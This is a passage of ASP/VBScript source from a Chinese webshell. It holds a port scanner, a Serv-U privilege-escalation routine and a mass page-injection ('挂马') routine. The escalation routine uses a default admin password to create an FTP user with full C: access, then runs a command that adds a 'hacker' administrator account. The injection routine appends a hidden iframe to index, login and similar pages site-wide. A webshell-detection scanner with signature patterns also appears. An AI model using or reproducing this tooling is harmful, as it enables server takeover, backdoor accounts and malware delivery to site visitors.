rrs("<b>扫描报告:</b><br><hr>")
tmp = split(request.form("port"),",")
ip = split(request.form("ip"),",")
for hu = 0 to ubound(ip)
if instr(ip(hu),"-") = 0 then
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then 
call scan(ip(hu), tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ip(hu), j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
else
ipstart = mid(ip(hu),1,instrrev(ip(hu),"."))
for xxx = mid(ip(hu),instrrev(ip(hu),".")+1,1) to mid(ip(hu),instr(ip
(hu),"-")+1,len(ip(hu))-instr(ip(hu),"-"))
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then 
call scan(ipstart & xxx, tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ipstart & xxx,j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
next
end if
next
timer2 = timer
thetime=cstr(int(timer2-timer1))
rrs"<hr>process in "&thetime&" s"
end if
end sub
sub scan(targetip, portnum)
    on error resume next
    set conn = server.createobject("adodb.connection")
    connstr="provider=sqloledb.1;data source=" & targetip &","& 
portnum &";user id=lake2;password=;"
    conn.connectiontimeout = 1
    conn.open connstr
    if err then
        if err.number = -2147217843 or err.number = -2147467259 
then
            if instr(err.description, "(connect()).") > 0 
then
                rrs(targetip & ":" & portnum & 
".........关闭<br>")
            else
                rrs(targetip & ":" & portnum & 
".........<font color=red>开放</font><br>")
            end if
        end if
    end if
end sub
select case action
  case "mainmenu":mainmenu()
  case "getterminalinfo":getterminalinfo()
  case "scanport":scanport()
  case "servu"
suaction=request("suaction")
if  not isnumeric(suaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "user " & user & vbcrlf
loginpass = "pass " & pass & vbcrlf
deldomain = "-deletedomain" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & " 
portno=" & ftpport & vbcrlf
mt = "site maintenance" & vbcrlf
newdomain = "-setdomain" & vbcrlf & "-domain=goldsun|0.0.0.0|" & 
ftpport & "|-1|1|0" & vbcrlf & "-tzoenable=0" & vbcrlf & " tzokey=" & 
vbcrlf
newuser = "-setusersetup" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & "-
portno=" & ftpport & vbcrlf & "-user=go" & vbcrlf & "-password=od" & 
vbcrlf & _
        "-homedir=c:\\" & vbcrlf & "-loginmesfile=" & vbcrlf & "-
disable=0" & vbcrlf & "-relpaths=1" & vbcrlf & _
        "-needsecure=0" & vbcrlf & "-hidehidden=0" & vbcrlf & "-
alwaysallowlogin=0" & vbcrlf & "-changepassword=0" & vbcrlf & _
        "-quotaenable=0" & vbcrlf & "-maxusersloginperip=-1" & vbcrlf & 
"-speedlimitup=0" & vbcrlf & "-speedlimitdown=0" & vbcrlf & _
        "-maxnrusers=-1" & vbcrlf & "-idletimeout=600" & vbcrlf & "-
sessiontimeout=-1" & vbcrlf & "-expire=0" & vbcrlf & "-ratioup=1" & 
vbcrlf & _
        "-ratiodown=1" & vbcrlf & "-ratioscredit=0" & vbcrlf & "-
quotacurrent=0" & vbcrlf & "-quotamaximum=0" & vbcrlf & _
        "-maintenance=system" & vbcrlf & "-passwordtype=regular" & 
vbcrlf & "-ratios=none" & vbcrlf & " access=c:\\|rwamelcdp" & vbcrlf
quit = "quit" & vbcrlf
newuser=replace(newuser,"c:",f)
select case suaction
case 1
set a=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",true, 
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & 
quit
set session("a")=a
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction' 
value='2'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在连接 127.0.0.1:"&port&",使用用户名: 
"&user&",口令:"&pass&"...<center>');"
rrs"settimeout('document.all.goldsun.submit();',4000);"
rrs"</script>"
case 2
set b=server.createobject("microsoft.xmlhttp")
b.open "get", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", 
true, "", ""
b.send "user go" & vbcrlf & "pass od" & vbcrlf & "site exec " & cmd & 
vbcrlf & quit
set session("b")=b
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction' 
value='3'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在提升权限,请等待…………<center>');"
rrs"settimeout(""document.all.goldsun.submit();"",4000);"
rrs"</script>"
case 3
set c=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", true, 
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
rrs"<center>提权完毕,已执行了命令:<br><font 
color=red>"&cmd&"</font><br><br>"
rrs"<input type=button value=' 返回继续 ' onclick=""location.href='?
action=servu';"">"
rrs"</center>"
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    set a = nothing
    b.abort
    set b = nothing
    c.abort
    set c = nothing
rrs"<center><form method='post' name='goldsun'>"
rrs"<table width='494' height='163' border='1' cellpadding='0' 
cellspacing='1' bordercolor='#666666'>"
rrs"<tr align='center' valign='middle'>"
rrs"<td colspan='2'>serv-u 提升权限 漫步云端修改版</td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td width='100'>用户名:</td>"
rrs"<td width='379'><input name='u' type='text' id='u' 
value='localadministrator'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>口 令:</td>"
rrs"<td><input name='p' type='text' id='p' 
value='#l@$ak#.lk;0@p'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>端 口:</td>"
rrs"<td><input name='port' type='text' id='port' value='43958'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>系统路径:</td>"
rrs"    <td><input name='f' type='text' id='f' value='"&f&"' 
size='8'></td>"
rrs"  </tr>"
rrs"  <tr align='center' valign='middle'>"
rrs"    <td>命 令:</td>"
rrs"    <td><input name='c' type='text' id='c' value='cmd /c net user 
hacker 123456 /add & net localgroup administrators hacker /add' 
size='50'></td>"
rrs"  </tr>"
rrs" <tr align='center' valign='middle'>"
rrs"    <td colspan='2'><input type='submit' name='submit' value='提
交'> "
rrs"<input type='reset' name='submit2' value='重置'>"
rrs"<input name='suaction' type='hidden' id='action' value='1'></td>"
rrs"</tr></table></form></center>"
end select
function gpath()
on error resume next
    err.clear
    set f=server.createobject("scripting.filesystemobject")
    if err.number>0 then
    gpath="c:"
        exit function
    end if
gpath=f.getspecialfolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function

  case "kmuma"
    dim report
    if request.querystring("act")<>"scan" then
          rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
        rrs ("<b>本程序目录</b>- "&server.mappath("."))

        rrs "<form action=""?action=kmuma&act=scan"" 
method=""post"" name=""form1"">"
        rrs "<p><b>填入你要检查的路径:</b>"
        rrs "<input name=""path"" type=""text"" 
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录<br><br>"
        rrs "你要干什么: <input class=c name=""radiobutton"" 
type=""radio"" value=""sws"" onclick=""document.getelementbyid
('showfile1').style.display='none'"" checked>查asp 马"
        rrs "<input class=c type=""radio"" name=""radiobutton"" 
value=""sf"" onclick=""document.getelementbyid
('showfile1').style.display=''"">搜索符合条件之文件<br>"
        rrs "<br /><div id=""showfile1"" 
style=""display:none"">"
        rrs "  查找内容:<input 
name=""search_content"" type=""text"" id=""search_content"" 
style=""border:1px solid #999"" size=""20"">"
        rrs " 要查找的字符串,不填就只进行日期检查<br />"
        rrs "  修改日期:<input name=""search_date"" 
type=""text"" style=""border:1px solid #999"" value="""&left(now
(),instr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写 
<a href=""#"" 
onclick=""javascript:form1.search_date.value='all'"">all</a><br />"
        rrs "  文件类型:<input 
name=""search_fileext"" type=""text"" style=""border:1px solid #999"" 
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型<br /><br 
/></div>"
        rrs "<input type=""submit"" value="" 开始扫描 "" 
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px 
2px;margin:4px;"" />"
        rrs "</form>"
    else
        if request.form("path")="" then
            rrs("路径不能为空")
            response.end()
        end if
        if request.form("path")="\" then
            tmppath = server.mappath("\")
        elseif request.form("path")="." then
            tmppath = server.mappath(".")
        else
            tmppath = request.form("path")
        end if

        timer1 = timer
        sun = 0
        sumfiles = 0
        sumfolders = 1
        if request.form("radiobutton") = "sws" then
            dimfileext = "asp,cer,asa,cdx"
            call showallfile(tmppath)
        else
            if request.form("path") = "" or request.form
("search_date") = "" or request.form("search_fileext") = "" then
                rrs("缉捕条件不完全<br><br><a 
href='javascript:history.go(-1);'>请返回重新输入</a>")
                response.end()
            end if
            dimfileext = request.form("search_fileext")
            call showallfile2(tmppath)
        end if
rrs "<table width=""100%"" border=""0"" cellpadding=""0"" 
cellspacing=""0"" style='font-size:12px'>"
rrs "<tr><th>scan webshell -- 漫步云端修改版</tr>"
rrs "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
rrs "<div id=""updateinfo"" style=""background:ffffe1;border:1px solid 
#89441f;padding:4px;display:none""></div>"
rrs "扫描完毕!一共检查文件夹<font 
color=""#ff0000"">"&sumfolders&"</font>个,文件<font 
color=""#ff0000"">"&sumfiles&"</font>个,发现可疑点<font 
color=""#ff0000"">"&sun&"</font>个"
rrs "<table width=""100%"" border=""1"" cellpadding=""0"" 
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
if request.form("radiobutton") = "sws" then
    rrs "<td width=""20%"">文件相对路径</td>"
    rrs "<td width=""20%"">特征码</td>"
    rrs "<td width=""40%"">描述</td>"
    rrs "<td width=""20%"">创建/修改时间</td>"
else   
    rrs "<td width=""50%"">文件相对路径</td>"
    rrs "<td width=""25%"">文件创建时间</td>"
    rrs "<td width=""25%"">修改时间</td>"
end if
    rrs "</tr>"
    rrs report
    rrs "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
rrs "<br><font style='font-size:12px'>本页执行共用了"&thetime&"毫秒
</font>"
    end if
sub showallfile(path)
    set f1so = createobject("scripting.filesystemobject")
    if not f1so.folderexists(path) then exit sub
    set f = f1so.getfolder(path)
    set fc2 = f.files
    for each myfile in fc2
        if checkext(f1so.getextensionname
(path&"\"&myfile.name)) then
            call scanfile(path&temp&"\"&myfile.name, "")
            sumfiles = sumfiles + 1
        end if
    next
    set fc = f.subfolders
    for each f1 in fc
        showallfile path&"\"&f1.name
        sumfolders = sumfolders + 1
    next
    set f1so = nothing
end sub
sub scanfile(filepath, infile)
server.scripttimeout=999999999
    if infile <> "" then
        infiles = "<font color=red>该文件被<a 
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(infile)&""" target=_blank>"& infile & "</a>文件包含执行</font>"
    end if
    set fso1s = createobject("scripting.filesystemobject")
    on error resume next
    set ofile = fso1s.opentextfile(filepath)
    filetxt = lcase(ofile.readall())
    if err then exit sub end if
    if len(filetxt)>0 then
        filetxt = vbcrlf & filetxt
        temp = "<a href=""http://"&request.servervariables
("server_name")&"/"&turlencode(replace(replace(filepath,server.mappath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(filepath,server.mappath("\")&"\","",1,1,1)&"</a><br />"
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")' 
 onclick='return yesok()' class='am' title='删除'>删除</a > "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"    
            if instr( filetxt, lcase
("wscr"&domybest&"ipt.shell") ) or instr( filetxt, lcase
("clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8") ) then
                report = 
report&"<tr><td>"&temp&"</td><td>wscr"&domybest&"ipt.shell 或者 
clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8</td><td><font 
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
                temp="-=| 同上 |=-"
            end if
            if instr( filetxt, lcase
("she"&domybest&"ll.application") ) or instr( filetxt, lcase
("clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000") ) then
                report = 
report&"<tr><td>"&temp&"</td><td>she"&domybest&"ll.application 或者 
clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000</td><td><font 
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
                temp="-=| 同上 |=-"
            end if
            set regex = new regexp
            regex.ignorecase = true
            regex.global = true
            regex.pattern = "\blanguage\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
            if regex.test(filetxt) then
                report = 
report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).encode</td><td><font color=red>似乎脚本被
加密了</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
                temp="-=| 同上 |=-"
            end if
            regex.pattern = "\bev"&"al\b"
            if regex.test(filetxt) then
                report = 
report&"<tr><td>"&temp&"</td><td>ev"&"al</td><td>e"&"val()函数可以执行
任意asp代码<br>但是javascript代码中也可以使用,有可能是误
报。"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
                sun = sun + 1
                temp="-=| 同上 |=-"
            end if
            regex.pattern = "[^.]\bexe"&"cute\b"
            if regex.test(filetxt) then
                report = 
report&"<tr><td>"&temp&"</td><td>exec"&"ute</td><td><font 
color=red>e"&"xecute()函数可以执行任意asp代码
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
                temp="-=| 同上 |=-"
            end if
            regex.pattern = "\.(open|create)textfile\b"
            if regex.test(filetxt) then
                report = 
report&"<tr><td>"&temp&"</td><td>.createtextfile|.opentextfile</td><td>
使用了fso的createtextfile|opentextfile读写文
件"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
                sun = sun + 1
                temp="-=| 同上 |=-"
            end if
            regex.pattern = "\.savetofile\b"
            if regex.test(filetxt) then
                report = 
report&"<tr><td>"&temp&"</td><td>.savetofile</td><td>使用了stream的
savetofile函数写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
                temp="-=| 同上 |=-"
            end if
            regex.pattern = "\.save\b"
            if regex.test(filetxt) then
                report = 
report&"<tr><td>"&temp&"</td><td>.save</td><td>使用了xmlhttp的save函数
写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
                temp="-=| 同上 |=-"
            end if
        set regex = nothing
        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        regex.pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
        set matches = regex.execute(filetxt)
        for each match in matches
            tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") - 
1),"/","\")
            if not checkext(fso1s.getextensionname(tfile)) 
then
                call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
                sumfiles = sumfiles + 1
            end if
        next
        set matches = nothing
        set regex = nothing
        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        regex.pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
        set matches = regex.execute(filetxt)
        for each match in matches
            tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") - 
1),"/","\")
            if not checkext(fso1s.getextensionname(tfile)) 
then
                call scanfile( server.mappath("\")
&"\"&tfile, replace(filepath,server.mappath("\")&"\","",1,1,1) )
                sumfiles = sumfiles + 1
            end if
        next
        set matches = nothing
        set regex = nothing
        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()"".*"""
        set matches = regex.execute(filetxt)
        for each match in matches
            tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") - 
1),"/","\")
            if not checkext(fso1s.getextensionname(tfile)) 
then
                call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
                sumfiles = sumfiles + 1
            end if
        next
        set matches = nothing
        set regex = nothing
        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()[^""]\)"
        if regex.test(filetxt) then
            report = 
report&"<tr><td>"&temp&"</td><td>server.exec"&"ute</td><td><font 
color=red>不能跟踪检查server.e"&"xecute()函数执行的文件。
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
            sun = sun + 1
        end if
        set matches = nothing
        set regex = nothing
        set xregex = new regexp
        xregex.ignorecase = true
        xregex.global = true
        xregex.pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
        set xmatches = xregex.execute(filetxt)
        for each match in xmatches
            tmplake2 = mid(match.value, 1, instr
(match.value, ">"))
            srcseek = instr(1, tmplake2, "src", 1)
            if srcseek > 0 then
                srcseek2 = instr(srcseek, tmplake2, 
"=")
                for i = 1 to 50
                    tmp = mid(tmplake2, srcseek2 + 
i, 1)
                    if tmp <> " " and tmp <> chr(9) 
and tmp <> vbcrlf then
                        exit for
                    end if
                next
                if tmp = """" then
                    tmpname = mid(tmplake2, 
srcseek2 + i + 1, instr(srcseek2 + i + 1, tmplake2, """") - srcseek2 - 
i - 1)
                else
                    if instr(srcseek2 + i + 1, 
tmplake2, " ") > 0 then tmpname = mid(tmplake2, srcseek2 + i, instr
(srcseek2 + i + 1, tmplake2, " ") - srcseek2 - i) else tmpname = 
tmplake2
                    if instr(tmpname, chr(9)) > 0 
then tmpname = mid(tmpname, 1, instr(1, tmpname, chr(9)) - 1)
                    if instr(tmpname, vbcrlf) > 0 
then tmpname = mid(tmpname, 1, instr(1, tmpname, vbcrlf) - 1)
                    if instr(tmpname, ">") > 0 then 
tmpname = mid(tmpname, 1, instr(1, tmpname, ">") - 1)
                end if
                call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tmpname , replace(filepath,server.mappath("\")
&"\","",1,1,1))
                sumfiles = sumfiles + 1
            end if
        next
        set matches = nothing
        set regex = nothing
        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        regex.pattern = "createo"&"bject[ |\t]*\(.*\)"
        set matches = regex.execute(filetxt)
        for each match in matches
            if instr(match.value, "&") or instr
(match.value, "+") or instr(match.value, """") = 0 or instr
(match.value, "(") <> instrrev(match.value, "(") then
                report = 
report&"<tr><td>"&temp&"</td><td>creat"&"eobject</td><td>crea"&"teobjec
t函数使用了变形技术"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
                sun = sun + 1
                exit sub
            end if
        next
        set matches = nothing
        set regex = nothing
    end if
    set ofile = nothing
    set fso1s = nothing
end sub
function checkext(fileext)
    if dimfileext = "*" then checkext = true
    ext = split(dimfileext,",")
    for i = 0 to ubound(ext)
        if lcase(fileext) = ext(i) then 
            checkext = true
            exit function
        end if
    next
end function
function getdatemodify(filepath)
    set f2so = createobject("scripting.filesystemobject")
    set f = f2so.getfile(filepath) 
    s = f.datelastmodified 
    set f = nothing
    set f2so = nothing
    getdatemodify = s
end function
function getdatecreate(filepath)
    set f3so = createobject("scripting.filesystemobject")
    set f = f3so.getfile(filepath) 
    s = f.datecreated 
    set f = nothing
    set f3so = nothing
    getdatecreate = s
end function
function turlencode(str)
    temp = replace(str, "%", "%25")
    temp = replace(temp, "#", "%23")
    temp = replace(temp, "&", "%26")
    turlencode = temp
end function
sub showallfile2(path)
    set f4so = createobject("scripting.filesystemobject")
    if not f4so.folderexists(path) then exit sub
    set f = f4so.getfolder(path)
    set fc2 = f.files
    for each myfile in fc2
        if checkext(f4so.getextensionname
(path&"\"&myfile.name)) then
            call isfind(path&"\"&myfile.name)
            sumfiles = sumfiles + 1
        end if
    next
    set fc = f.subfolders
    for each f1 in fc
        showallfile2 path&"\"&f1.name
        sumfolders = sumfolders + 1
    next
    set f4so = nothing
end sub
sub isfind(thepath)
    thedate = getdatemodify(thepath)
    on error resume next
    thetmp = mid(thedate, 1, instr(thedate, " ") - 1)
    if err then exit sub
    xdate = split(request.form("search_date"),";")
    if request.form("search_date") = "all" then alltime = true
    for i = 0 to ubound(xdate)
        if thetmp = xdate(i) or alltime = true then 
            if request("search_content") <> "" then
                set fso2s = createobject
("scripting.filesystemobject")
                set ofile = fso2s.opentextfile(thepath, 
1, false, -2)
                filetxt = lcase(ofile.readall())
                if instr( filetxt, lcase(request.form
("search_content"))) > 0 then
                    temp = "<a 
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(thepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a>"
    temp=temp&" → <a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")' 
 onclick='return yesok()' class='am' title='删除'>删除</a > "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"    
                report = report&"<tr><td 
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
                    report = 
report&"<tr><td>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
                    sun = sun + 1
                    exit sub
                end if
                ofile.close()
                set ofile = nothing
                set fso2s = nothing
            else
                temp = "<a 
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(filepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a> "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")' 
 onclick='return yesok()' class='am' title='删除'>删除</a > "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
    temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"    
                report = report&"<tr><td 
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
                sun = sun + 1
                exit sub
            end if
        end if
    next
end sub

  case "plgm"
server.scripttimeout=1000000 
response.buffer=false 
rrs ("<b>当前网站绝对路径:")&server.mappath("/")&("</b>")
asp_self=request.servervariables("path_info") 
s=request("fd") 
if s="" then s=server.mappath("/")
ex=request("ex") 
pth=request("pth") 
newcnt=request("newcnt") 
addcode = request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0 
height=0></iframe>"
if ex<>"" and pth<>"" then 
select case ex 
case "edit" 
call file_show(pth) 
case "save" 
call file_save(pth) 
end select 
else 
rrs("<form method=""post""> ")
rrs("<table width=560 border=""0"" style=""font-size:12px;"">")
rrs("<tr>")
rrs("<td width=""102"">要挂马文件夹的绝对路径:</td>")
rrs("<td width=""359""><input type=""text"" name=""fd"" value="""&s&""" 
size=60></td>")
rrs("<td width=""69""> </td>")
rrs("</tr><tr><td>要挂马的代码:</td>")
rrs("<td><textarea name=""code"" cols=58 
rows=""3"">"&addcode&"</textarea></td>")
rrs("<td><input name=""submit"" type=""submit"" value=""开始""></td>")
rrs("</tr></table></form> ")
end if 
function ispattern(patt,str) 
set regex=new regexp 
regex.pattern=patt 
regex.ignorecase=true 
retval=regex.test(str) 
set regex=nothing 
if retval=true then 
ispattern=true 
else 
ispattern=false 
end if 
end function 
if request.form("submit")<>"" then
if s="" or addcode="" then
rrs "<font color=red>请输入挂马的路径或代码!</font>"
response.end
else if ispattern("[^ab]{1}:{1}(\\|\/)",s) then sch s 
end if
end if 
sub sch(s) 
on error resume next 
set fs=server.createobject("scripting.filesystemobject") 
set fd=fs.getfolder(s) 
set fi=fd.files 
set sf=fd.subfolders 
for each f in fi 
rtn=f.path 
step_all rtn 
next 
if sf.count<>0 then 
for each l in sf 
sch l 
next 
end if 
end sub 
sub step_all(agr) 
retval=ispattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|qq|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr) 
if retval then 
step1 agr 
step2 agr 
else 
exit sub 
end if 
end sub 
sub step1(str1)
rrs "<div style='line-height:20px'>√ "&str1&" _"
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""downfile"")' class='am' title='下载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")'onclick='return yesok()' class='am' title='删除'>删除
</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a></div>"
end sub 
sub step2(str2) 
set fs=server.createobject("scripting.filesystemobject") 
isexist=fs.fileexists(str2) 
if isexist then 
set f=fs.getfile(str2) 
set f_addcode=f.openastextstream(8,-2) 
if left(right(str2,8),4)="conn" then
f_addcode.write
else
f_addcode.write addcode 
f_addcode.close 
set f=nothing 
end if 
end if
set fs=nothing 
end sub 
err.clear
  case "cplgm"
    fpath=request("fd")
    addcode = request("code")
    addcode2 = request("code2")
    pcfile=request("pcfile")
    checkbox=request("checkbox")
    showmsg=request("showmsg")
    ftype=request("ftype")
    m=request("m")
    if ftype="" then 
ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
    if fpath="\" then fpath=server.mappath("\")
    if fpath="." or fpath="" then fpath=server.mappath("/")    
    if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm 
width=0 height=0></iframe>"
    if checkbox="" then checkbox=request("checkbox")
    if pcfile="" then
        pcfilename=request.servervariables("script_name")
        pcfilek=split(pcfilename,"/") 
        pcfilen=ubound(pcfilek) 
        pcfile=pcfilek(pcfilen) 
    end if
      rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
